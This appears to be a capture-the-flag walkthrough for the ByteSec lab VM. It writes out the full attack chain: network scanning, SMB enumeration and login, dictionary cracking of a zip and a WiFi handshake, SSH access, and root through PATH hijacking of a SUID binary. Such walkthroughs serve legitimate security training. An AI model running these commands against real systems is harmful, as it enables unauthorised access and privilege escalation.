Flag : 2 Flag first user And second root. Learning : exploit, SMB, Enumration, Stenography, Privilege Escalation. We recommend that you use VirtualBox and not VMware for this VM
URL: OS ByteSec
Author: Rahul Gehlaut
Set up the Machine with a host-only adapter and run a net discover command to find the associated IP. My interface eth1 is Host-Only on my main OS (Kali Linux).
netdiscover -i eth1
We can identify the machine with the IP 192.168.56.116, so we will scan it for open ports with nmap to a file named “nmap” with the following command:
nmap -sS -p- -A -o "nmap" 192.168.56.116
We have identified ports 80 139 445 2525 are open. Ports 138 and 2525 are worth noting as they could be smb. Read more about Samba shares here
To start, port 80 is open so we will investigate this port with a browser.
At first glance, the bottom of the web page has the following text:
This is also seen in the page source:
This gives us a pretty obvious hint that there is probably samba running. Let’s perform some enumeration based on this information with the tool enum4linux. This tool is for enumerating information from Windows and Samba systems.
Known Usernames = administrator, guest, krbtgt, domain admins, root, bin, none.
Let’s try and log into SMB with smbclient. This tool launches an ftp-like client to access SMB/CIFS resources on servers - computerhope.
Execute the following command:
smbclient //192.168.56.116/smb -U smb -p
To break this command down, we are specifying the //host/smb with user -U smb and -p enables a printer service rather than as a normal filespace service.
We are logged in. There is a file named safe.zip and main.txt which we will transfer to our local system with “get”.
ls get safe.zip get main.txt
There doesn’t seem to be anything on main.txt, let’s have a look at the archive:
The .zip file seems to be password protected. There is a tool we can use to try and crack the password by brute forcing.
fcrackzip is a zip file password cracker.
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip
To break down this command, -D specifies a dictionary attack, -p specifies the rockyou.txt dictionary and -u specifies the file we want to crack. The command will essentially try to decompress the zip archive using the passwords in the wordlist and return the password when successful.
A password has been found:
PASSWORD FOUND!!!!: pw == hacker1
Unzipping the file using the password gives us a .cap file. A .cap file is a packet capture file which can be analysed with traffic capture software such as Wireshark. To read more about this, Life Wire have a pretty good article on this. Let’s open up the file with Wireshark.
Looking at the .cap file, we see the protocol 802.11 being used. This Wireshark website explains the protocol that is seen on this traffic capture: Wireshark
After some research, we can identify WLAN as IEEE 802.11. These could be packets captured via WiFi. When analysing Wifi traffic, can often find a 3-way handshake whenever someone joins the network. We can try and crack this .cap file for any passwords.
Let’s use aircrack-ng, a tool which accesses WiFi network security. Run the following command:
aircrack-ng user.cap -w /usr/share/wordlists/rockyou.txt
Aircrack has found a password:
KEY FOUND! [ snowflake ]
There is a username that can easily be seen in the packet capture:
Now that we have a username and password, let’s try logging in with SSH. If you remember, a different port was open for ssh.
cat nmap | grep ssh
SSH on port 2525.
ssh [email protected] -p 2525
Let’s upgrade our shell with the following command:
python -c 'import pty;pty.spawn("/bin/bash")'
There are a few different home directories for users sagar, smb and blackjax:
This next section will be focusing on exploiting Set User ID (SUID). This is a good article about this if you want to read more:
And another website for some priv esc with a section on SUID:
The following command will identify any SUID enabled executables on the unix machine:
find / -user root -perm -4000 -print 2>/dev/null
For reference, these are a list of binaries native to Linux, meaning we should not investigate any of these:
ping ping6 passwd sudo chfn apring gpasswd chsh chfn mount sudo su umount mount newgrp pppd
One of the binaries identified from the command:
This is evidently not native so let’s have a closer look. Run the binary with the following command:
Let’s exploit this with the following commands:
cd /tmp echo "/bin/bash" > netstat chmod 777 netstat export PATH=/tmp:$PATH /usr/bin/netscan
These commands essentially create a file called netstat in /tmp with correct permissions. The export command marks an environment variable to be exported to child-processes. Then the netscan binary is run again.
And we are root, with root flag: